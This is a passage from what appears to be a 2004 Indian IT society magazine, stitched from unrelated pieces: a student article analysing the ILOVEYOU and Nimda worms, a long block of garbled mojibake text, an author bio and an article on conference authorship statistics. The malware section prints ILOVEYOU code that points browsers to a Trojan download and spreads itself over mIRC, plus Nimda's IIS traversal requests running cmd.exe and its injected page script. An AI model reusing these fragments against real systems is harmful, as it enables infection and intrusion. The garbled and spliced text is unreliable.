elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 25: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

